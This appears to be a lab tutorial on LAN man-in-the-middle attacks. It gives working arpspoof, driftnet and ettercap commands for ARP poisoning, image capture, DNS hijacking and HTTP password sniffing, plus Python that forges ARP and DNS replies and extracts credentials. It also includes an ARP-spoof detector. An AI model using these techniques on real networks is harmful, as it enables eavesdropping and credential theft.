This is the first day of my participation in the August Challenge. For details, see: August is more challenging.

Preface


Penetration testing carries risk; proceed with caution, and only in an environment you are authorized to test.

1. Introduction to man-in-the-middle attacks

Most wireless spoofing attacks take the form of a wireless man-in-the-middle attack. A man-in-the-middle (MitM) attack is an "indirect" intrusion: by intercepting, inserting, forging or dropping packets, the attacker logically places a computer under their control between two communicating hosts on the network path. That computer is the "man in the middle".

2. Commonly used spoofing tools

Kali Linux ships a set of spoofing tools, including ettercap, arpspoof, DNSChef and sslstrip.

3. Man-in-the-middle attack (1): arpspoof + driftnet

1. Introduction to the MiTM attack

A MitM attack hijacks the traffic between two parties; once that traffic passes through the attacker's machine it can be examined with a packet sniffer such as Wireshark, which shows the details of every packet and can save the capture for later analysis. As a scenario, suppose a foreign spy is monitoring an expert's computer, and my job is to find out whether they have stolen any image data (classified maps, plans, intellectual property and so on) from it. To judge the extent of the damage I need to know exactly which images were transmitted. First I have to get into the middle, between the target and the router, so that all of the target's traffic passes through me. Then I use a tool called driftnet, which extracts images from the data stream on a given interface, so the images can be saved and displayed on my own machine.

2. arpspoof implements the MiTM attack

At first I had two candidate methods for the MitM: arpspoof and ettercap.

Ettercap is a popular sniffing and interception tool. It abuses a weakness of ARP, the protocol hosts use to find each other's hardware addresses on a local area network (LAN): ARP has no authentication, so any host can claim any IP address. Ettercap places itself between a target and a server, sniffs the traffic between them and steals the users' data. arpspoof performs the same ARP spoofing; ettercap is easier to use, but arpspoof is more reliable, so in the end I chose arpspoof for the MitM.

1) Information collection

Get Kali's IP address:

```shell
ifconfig
# Kali (eth0): 192.168.200.129
```

Get the victim's IP address (the victim is a Windows host):

```
ipconfig
# victim: 192.168.200.134
```

2) Enable IP forwarding

```shell
echo 1 > /proc/sys/net/ipv4/ip_forward
```

3) Start spoofing

```shell
arpspoof -i eth0 -t 192.168.200.134 192.168.200.1
```

1. `arpspoof -i <nic> -t <target IP> <gateway IP>` tells the target (the victim) that the gateway's IP address lives at Kali's MAC address, so everything the target sends to the gateway goes through Kali first.
2. `arpspoof -i <nic> -t <gateway IP> <target IP>` tells the gateway that the victim's IP address lives at Kali's MAC address, so the data the gateway returns to the target also passes through Kali.

In general, the argument after `-t` is the host whose ARP cache is poisoned and the last positional argument is the IP address Kali pretends to own; the `-r` flag (used later in this section) poisons both hosts at once. One caveat: this article uses both 192.168.200.1 and 192.168.200.2 as the gateway address. Use the victim's real default gateway (`ip route` on Kali, `ipconfig` on the victim), otherwise the victim loses connectivity instead of being silently relayed.
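The frames behind the two command forms above, as an added example (Python I wrote for this article, not code from dsniff/arpspoof): it builds the unsolicited ARP replies that `arpspoof -t <target> <host>` sends, once for the victim and, when `-r` is given, once more for the gateway, and decodes them so the effect of each argument is visible. The IP addresses are the article's lab values (gateway 192.168.200.1 as in the command above); the MAC addresses are constructed. Nothing is transmitted, since that would need a raw socket and root.

```python
"""What arpspoof puts on the wire: the forged ARP replies behind
"arpspoof -i eth0 -t <target> <host>", built as raw Ethernet frames.

Added example for this article, not code from dsniff/arpspoof. The IP
addresses are the article's lab values; the MAC addresses are constructed.
Nothing is transmitted: sending needs a raw socket and root.
"""
import ipaddress
import struct

ETH_TYPE_ARP = 0x0806
ARP_OP_REPLY = 2

# Constructed lab addresses (the IPs match the article, the MACs are made up).
KALI_MAC = "00:0c:29:aa:bb:cc"
VICTIM_MAC = "08:00:27:11:22:33"
GATEWAY_MAC = "00:50:56:e9:01:02"
VICTIM_IP = "192.168.200.134"
GATEWAY_IP = "192.168.200.1"


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", "").replace("-", ""))


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet frame carrying an unsolicited ARP reply that tells target
    '<sender_ip> is at <sender_mac>'. arpspoof uses its own interface MAC
    as both the Ethernet source and the ARP sender hardware address."""
    eth = struct.pack("!6s6sH", mac_bytes(target_mac), mac_bytes(sender_mac), ETH_TYPE_ARP)
    arp = struct.pack(
        "!HHBBH6s4s6s4s",
        1,            # hardware type: Ethernet
        0x0800,       # protocol type: IPv4
        6, 4,         # hardware / protocol address lengths
        ARP_OP_REPLY,
        mac_bytes(sender_mac), ipaddress.IPv4Address(sender_ip).packed,
        mac_bytes(target_mac), ipaddress.IPv4Address(target_ip).packed,
    )
    return eth + arp


def parse_arp(frame):
    """Decode a frame produced by build_arp_reply (or captured off the wire)."""
    _dst, _src, eth_type = struct.unpack("!6s6sH", frame[:14])
    if eth_type != ETH_TYPE_ARP:
        raise ValueError("not an ARP frame")
    _, _, _, _, op, sha, spa, tha, tpa = struct.unpack("!HHBBH6s4s6s4s", frame[14:42])
    return {
        "op": op,
        "sender_mac": mac_str(sha), "sender_ip": str(ipaddress.IPv4Address(spa)),
        "target_mac": mac_str(tha), "target_ip": str(ipaddress.IPv4Address(tpa)),
    }


def arpspoof_frames(attacker_mac, victim_mac, victim_ip, gateway_mac, gateway_ip, both_ways):
    """Frames for `arpspoof -t victim gateway`; with both_ways (the -r flag)
    also the reverse `-t gateway victim`, so replies come back through Kali."""
    frames = [build_arp_reply(attacker_mac, gateway_ip, victim_mac, victim_ip)]
    if both_ways:
        frames.append(build_arp_reply(attacker_mac, victim_ip, gateway_mac, gateway_ip))
    return frames


if __name__ == "__main__":
    for f in arpspoof_frames(KALI_MAC, VICTIM_MAC, VICTIM_IP, GATEWAY_MAC, GATEWAY_IP, True):
        d = parse_arp(f)
        print(f"to {d['target_ip']}: '{d['sender_ip']} is at {d['sender_mac']}'")
```

Each frame is 42 bytes: a 14-byte Ethernet header addressed to the poisoned host, then a 28-byte ARP reply whose sender fields pair the impersonated IP with Kali's MAC. That pairing is exactly what the victim's `arp -a` shows later in the article when the gateway entry carries Kali's MAC.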

3. driftnet receives the pictures

driftnet is a simple, easy-to-use image capture tool that extracts images from network packets; it can also extract and play audio streams. It can pull photos out of WeChat Moments, Weibo posts and the like, but only when they travel over plaintext HTTP: images fetched over HTTPS are encrypted and invisible to it.

At this point all the images the two parties send or receive pass through Kali, so the next step is to activate driftnet. Type driftnet in any terminal in Kali, but not in the terminal where arpspoof is running: arpspoof runs in the foreground, and interrupting it would end the poisoning.

If Kali does not have it installed, just install it:

```shell
apt-get install driftnet
```

Once the arpspoof window shows it is sending replies, start the capture tool:

```shell
driftnet -i eth0   # -i selects the network interface to listen on
```

Browsing to the 4399 website from the victim's computer, we see the pictures captured on Kali.

4. Fixing driftnet not capturing any pictures

If driftnet captures nothing, the cause is usually the arpspoof command line.

Most online tutorials give:

```shell
arpspoof -i [nic name] -t [victim IP] [gateway IP]
arpspoof -i eth0 -t 192.168.200.134 192.168.200.2
```

With this running, capture packets with Wireshark on Kali's eth0 and filter on the victim's IP; the victim's traffic appears.

All the captured packets are sent *by* the victim's IP (192.168.200.134). With the command above I am impersonating the gateway towards the victim only: the requests the victim sends out reach me first, but the gateway still has the victim's real MAC address in its ARP cache, so it sends its replies straight to the victim, bypassing Kali. Basic networking gives the rest: this command only sees the request direction, i.e. images the victim uploads. Images the victim downloads travel in the response stream, which this command never sees, so to capture them a different command is needed.

To see the response stream instead, poison the gateway:

```shell
arpspoof -i [nic name] -t [gateway IP] [victim IP]
arpspoof -i eth0 -t 192.168.200.1 192.168.200.134
```

To capture both the request stream and the response stream, add `-r`, which poisons both hosts (`-r` is a flag and takes no argument; the impersonated host is still the last positional argument):

```shell
arpspoof -i [nic name] -r -t [victim IP] [gateway IP]
arpspoof -i eth0 -r -t 192.168.200.134 192.168.200.1
```

5. Saving the captured images permanently

```shell
driftnet -i eth0 -b -a -d <directory>
# -b beep when an image is captured, -a adjunct mode (save only, no display window),
# -d directory to save the images into
```

4. Man-in-the-middle attack (2): ARP spoofing and DNS hijacking with ettercap

1. Traffic forwarding

If we only intercept the traffic without forwarding it, the attacked host loses connectivity and quickly notices something is wrong. How do we monitor it without it noticing? By enabling traffic forwarding. Before performing DNS spoofing, check whether IP forwarding is enabled on the attacking machine: `net.ipv4.ip_forward = 0` means it is not, and it has to be set to 1 manually.

```shell
sysctl net.ipv4.ip_forward
# if it prints net.ipv4.ip_forward = 0, enable it:
sysctl -w net.ipv4.ip_forward=1
# or make it permanent by editing /etc/sysctl.conf (vi /etc/sysctl.conf)
```

2. Start the Apache service

```shell
service apache2 start
```

3. Modify the DNS file and design the page

1) Edit ettercap's DNS spoofing file

```shell
vi /etc/ettercap/etter.dns
```

```
* A 192.168.200.129
```

The first column is the hostname pattern to hijack: `*` matches every name, so every lookup the victim makes is answered with 192.168.200.129. If `*` is changed to www.qq.com, only that name is hijacked, and a victim visiting www.qq.com lands on the Apache page at 192.168.200.129. `A` is the record type, and 192.168.200.129 is the address the victim is sent to, which must be Kali's own eth0 address.
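The matching and the forged reply that the dns_spoof plugin performs for an entry like the one above, as an added example (Python I wrote for this article, not ettercap's code). It assumes the `name A ip` line format with `*` as a wildcard, approximates ettercap's wildcard matching with `fnmatch`, and builds its own query; the ETTER_DNS text, the transaction ids and the queried names are constructed. Name compression inside queries is not handled.

```python
"""DNS hijacking the way the dns_spoof plugin does it: match the queried
name against etter.dns-style entries and answer with a forged A record.

Added example for this article, not ettercap's own code. The etter.dns
lines and the queries are constructed; wildcard matching is approximated
with fnmatch, and name compression in queries is not handled.
"""
import fnmatch
import ipaddress
import struct

# Constructed etter.dns content mirroring the article's entry.
ETTER_DNS = """
# hijack every name to Kali's Apache server
*        A   192.168.200.129
"""


def parse_etter_dns(text):
    """Return (hostname pattern, ip) pairs for every 'name A ip' line."""
    rules = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        parts = line.split()
        if len(parts) == 3 and parts[1].upper() == "A":
            rules.append((parts[0].lower(), parts[2]))
    return rules


def lookup(rules, qname):
    """First rule whose pattern matches qname ('*' or '*.qq.com' style)."""
    qname = qname.lower().rstrip(".")
    for pattern, ip in rules:
        if fnmatch.fnmatchcase(qname, pattern):
            return ip
    return None


def encode_name(name):
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode() for l in labels) + b"\x00"


def decode_name(msg, off):
    labels = []
    while True:
        n = msg[off]
        off += 1
        if n == 0:
            return ".".join(labels), off
        labels.append(msg[off:off + n].decode())
        off += n


def build_query(txid, qname):
    """A standard recursive A query, as a stub resolver would send it."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(qname) + struct.pack("!HH", 1, 1)


def txid_of(msg):
    return struct.unpack("!H", msg[:2])[0]


def spoof_response(query, rules, ttl=300):
    """Forged answer for an A query that matches a rule, else None.
    The transaction id and question are copied from the query so the
    victim's resolver accepts the reply as the genuine one."""
    txid, flags, qdcount = struct.unpack("!HHH", query[:6])
    if flags & 0x8000 or qdcount != 1:      # a response, or malformed
        return None
    qname, off = decode_name(query, 12)
    qtype, qclass = struct.unpack("!HH", query[off:off + 4])
    if (qtype, qclass) != (1, 1):           # only A / IN is hijacked here
        return None
    ip = lookup(rules, qname)
    if ip is None:
        return None
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)   # QR, RD, RA
    question = query[12:off + 4]
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, 4)   # name ptr, A, IN, TTL, rdlength
    answer += ipaddress.IPv4Address(ip).packed
    return header + question + answer


def answer_ip(response):
    """Read the A record back out of a response built by spoof_response."""
    _, off = decode_name(response, 12)
    off += 4 + 2 + 10   # qtype/qclass, name pointer, type/class/ttl/rdlength
    return str(ipaddress.IPv4Address(response[off:off + 4]))
```

Because the forged reply copies the query's transaction id and question and arrives from the LAN before the real resolver's answer, the victim's stub resolver takes it as authoritative; the `*` rule means every name resolves to Kali, which is what the article's screenshots show.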

2) Design the index.html file

This file is the site's home page (Apache serves /var/www/html/index.html by default). You can modify the original index.html, or write a new page and replace the previous index.html with it.

```html
<html>
<head><title>ARE YOU KIDDING</title></head>
<body>
<h1>hello, test..... !!!!!</h1>
<p>SOMETHING FOR NOTHING!</p>
</body>
</html>
```

Test the page locally:

```
http://127.0.0.1/
```

4. Start the ettercap GUI

1) Launch the big spider

```shell
ettercap -G
```

`-G` starts the graphical mode. If you prefer not to use the graphical interface, ettercap also has a text mode; I will attach the command-line form of the DNS spoofing later.

2) Configure the NIC

For a LAN environment select eth0; choose the network adapter that matches your own setup.

3) Overview of the functions

Confirm that eth0 is selected and click the check mark to start sniffing; the same toolbar starts and stops the scanning.

4) Scan for live hosts

Hosts -> Scan for hosts, then Hosts -> Hosts list shows how many hosts were found in the network segment and lists them.

5) List the scanned hosts

The MAC and IP addresses of the hosts found alive.

6) Add the gateway and the listening host

Select 192.168.200.134 (the victim host) and click Add to Target 1; the log shows: Host 192.168.200.134 added to TARGET1.

Then select the gateway 192.168.200.2 and click Add to Target 2; the log shows: Host 192.168.200.2 added to TARGET2.

7) Configure ARP poisoning

Mitm -> ARP poisoning, and tick "Sniff remote connections" (remote sniffing).

8) Configure plugins

Plugins -> Manage plugins, then double-click dns_spoof to activate it.

9) DNS hijacking succeeded

From now on, whenever the victim's computer visits any HTTP site it is redirected to the index.html page I specified.

(Screenshot: an HTTP site, redirected to the fake page)

(Screenshot: an HTTPS site)

For an HTTPS site the hostname also resolves to Kali, but the browser does not silently display the fake page: Kali cannot present a valid certificate for that name, so the TLS handshake fails (or the connection is refused if Apache is not listening on 443) and the victim sees a certificate or connection error instead of the Apache page.

10) Analysis and inspection

View the victim's ARP table (`arp -a` on Windows):

The MAC address shown for the gateway is the same as Kali's MAC address, which can never happen on a healthy network.

Ping a hostname from the victim and it resolves to the hijacked IP address:

We see Kali's address. To stop the ARP hijacking, stop the attack in ettercap (Mitm -> Stop mitm attack(s)) or close the arpspoof window; both re-ARP the hosts with the correct addresses on exit.
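The check in section 10, done automatically from the defender's side, as an added example (Python I wrote for this article, not from any tool on the page): it parses a neighbour table (Windows `arp -a` or Linux `ip neigh` output) and flags a unicast MAC that is claimed by more than one IP, plus a gateway MAC that differs from a recorded baseline. The `arp -a` text and all MAC addresses are constructed to look like the poisoned victim.

```python
"""Spot the symptom from section 10 automatically: a neighbour table in
which the gateway's MAC address is also some other host's MAC address.

Added example for this article, not from any tool on the page. The
`arp -a` output below is constructed to look like the poisoned victim;
the parser accepts Windows `arp -a` and Linux `ip neigh` formats.
"""
import re
from collections import defaultdict

# Constructed victim-side `arp -a` after poisoning: the gateway (.2) and
# Kali (.129) show the same MAC. Broadcast/multicast rows are normal.
SAMPLE_ARP_A = """\
Interface: 192.168.200.134 --- 0xb
  Internet Address      Physical Address      Type
  192.168.200.2         00-0c-29-aa-bb-cc     dynamic
  192.168.200.129       00-0c-29-aa-bb-cc     dynamic
  192.168.200.255       ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
  255.255.255.255       ff-ff-ff-ff-ff-ff     static
"""

ENTRY_RE = re.compile(
    r"(\d{1,3}(?:\.\d{1,3}){3}).*?\b((?:[0-9a-f]{2}[:-]){5}[0-9a-f]{2})\b", re.I)


def parse_neighbors(text):
    """IP -> normalised MAC, from `arp -a` (Windows) or `ip neigh` (Linux)."""
    table = {}
    for line in text.splitlines():
        m = ENTRY_RE.search(line)
        if m:
            table[m.group(1)] = m.group(2).lower().replace("-", ":")
    return table


def is_group_mac(mac):
    """Broadcast/multicast MACs legitimately map to many IPs; skip them."""
    return int(mac[:2], 16) & 1 == 1


def shared_macs(table):
    """MAC -> list of IPs, for every unicast MAC claimed by more than one IP."""
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        if not is_group_mac(mac):
            by_mac[mac].append(ip)
    return {mac: ips for mac, ips in by_mac.items() if len(ips) > 1}


def detect_arp_spoof(text, gateway_ip, known_gateway_mac=None):
    """Findings as strings: duplicate unicast MACs, and a gateway MAC that
    differs from a previously recorded baseline (if one is supplied)."""
    table = parse_neighbors(text)
    findings = []
    for mac, ips in shared_macs(table).items():
        tag = " (includes the gateway)" if gateway_ip in ips else ""
        findings.append(f"MAC {mac} claimed by {', '.join(sorted(ips))}{tag}")
    current = table.get(gateway_ip)
    if known_gateway_mac and current and current != known_gateway_mac.lower():
        findings.append(f"gateway {gateway_ip} moved from {known_gateway_mac} to {current}")
    return findings


if __name__ == "__main__":
    for line in detect_arp_spoof(SAMPLE_ARP_A, "192.168.200.2", "00:50:56:e9:01:02"):
        print("ALERT:", line)
```

The baseline check is the stronger of the two signals: an attacker who poisons only the gateway entry and is not otherwise listed in the table produces no duplicate, but the gateway's MAC still changes from the value recorded when the network was known good.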

5. Man-in-the-middle attack (3): arpspoof + ettercap password sniffing

1. Enable route forwarding

```shell
echo 1 > /proc/sys/net/ipv4/ip_forward
```

Use arpspoof to poison the hosts, either one direction only or, with `-r`, both directions:

```shell
arpspoof -i eth0 -t 192.168.200.134 192.168.200.2       # victim IP, gateway IP
arpspoof -i eth0 -r -t 192.168.200.134 192.168.200.2    # -r: poison both directions
```

2. Use ettercap to sniff the traffic

With arpspoof already doing the ARP spoofing, ettercap only needs to sniff and dissect the traffic to capture HTTP login passwords:

```shell
ettercap -Tq -i eth0   # -T text mode, -q quiet: print only dissected credentials and messages
```

3. Obtain the browsing user's password

When the victim logs in to a site over plain HTTP, ettercap's HTTP dissector prints the credentials it sees as a line of the form `HTTP : <server>:80 -> USER: ... PASS: ... INFO: <url>`. Logins submitted over HTTPS are encrypted and produce no such line.
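What the dissector is looking for in that plaintext traffic, as an added example (Python I wrote for this article, not ettercap's code): it splits a raw HTTP request, pulls credentials out of either a Basic `Authorization` header or the fields of an `application/x-www-form-urlencoded` POST, and formats them in the spirit of ettercap's USER/PASS line. The two requests are constructed, and the lists of likely user and password field names are my assumption, not ettercap's own list.

```python
"""What ettercap's HTTP dissector is looking for when it prints a
USER/PASS line: credentials carried in plain HTTP, either as a Basic
Authorization header or as fields of a form POST.

Added example for this article, not ettercap's code. The two requests
below are constructed; the field-name lists are an assumption about what
a login form is likely to call its inputs, not ettercap's own list.
"""
import base64
from urllib.parse import parse_qs

USER_KEYS = {"user", "username", "login", "email", "uid", "account"}
PASS_KEYS = ("pass", "pwd")   # substring match: password, passwd, ...

# Constructed: a login form submitted over plain HTTP by the victim.
FORM_POST = (
    b"POST /login HTTP/1.1\r\n"
    b"Host: www.example.test\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 31\r\n\r\n"
    b"username=alice&password=hunter2"
)

# Constructed: a page protected with HTTP Basic authentication.
BASIC_GET = (
    b"GET /admin/ HTTP/1.1\r\n"
    b"Host: intranet.example.test\r\n"
    b"Authorization: Basic " + base64.b64encode(b"bob:s3cret") + b"\r\n\r\n"
)


def split_request(raw):
    """(method, request-target, lower-cased headers, body) from raw bytes."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target = lines[0].split(" ", 2)[:2]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def extract_credentials(raw):
    """Credentials found in one plaintext HTTP request, or None."""
    method, target, headers, body = split_request(raw)
    host = headers.get("host", "?")
    auth = headers.get("authorization", "")
    if auth.lower().startswith("basic "):
        # Basic auth is just base64("user:password"), readable by anyone on the path.
        user, _, password = base64.b64decode(auth[6:]).decode("latin-1").partition(":")
        return {"host": host, "url": target, "user": user, "pass": password, "via": "basic"}
    ctype = headers.get("content-type", "")
    if method.upper() == "POST" and ctype.startswith("application/x-www-form-urlencoded"):
        fields = parse_qs(body.decode("latin-1"))
        user = next((v[0] for k, v in fields.items() if k.lower() in USER_KEYS), None)
        password = next((v[0] for k, v in fields.items()
                         if any(p in k.lower() for p in PASS_KEYS)), None)
        if user is not None or password is not None:
            return {"host": host, "url": target, "user": user, "pass": password, "via": "form"}
    return None


def report(raw):
    """One line in the spirit of ettercap's 'USER: .. PASS: ..' output."""
    c = extract_credentials(raw)
    if c is None:
        return None
    return f"HTTP : {c['host']} -> USER: {c['user']}  PASS: {c['pass']}  INFO: {c['url']}"
```

The same parser applied to a TLS connection would only ever see the encrypted records, never a request line or a form body; that is the whole reason the attack in this section only works against sites that still log users in over plain HTTP.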

6. Summary

First, what a man in the middle is and how the attack works. Then arpspoof + driftnet were used to hijack the traffic between two hosts and carry out a MitM attack; ettercap was used for ARP spoofing and DNS hijacking; and arpspoof + ettercap were used to sniff passwords, with arpspoof doing the spoofing and ettercap sniffing the login password out of plain HTTP.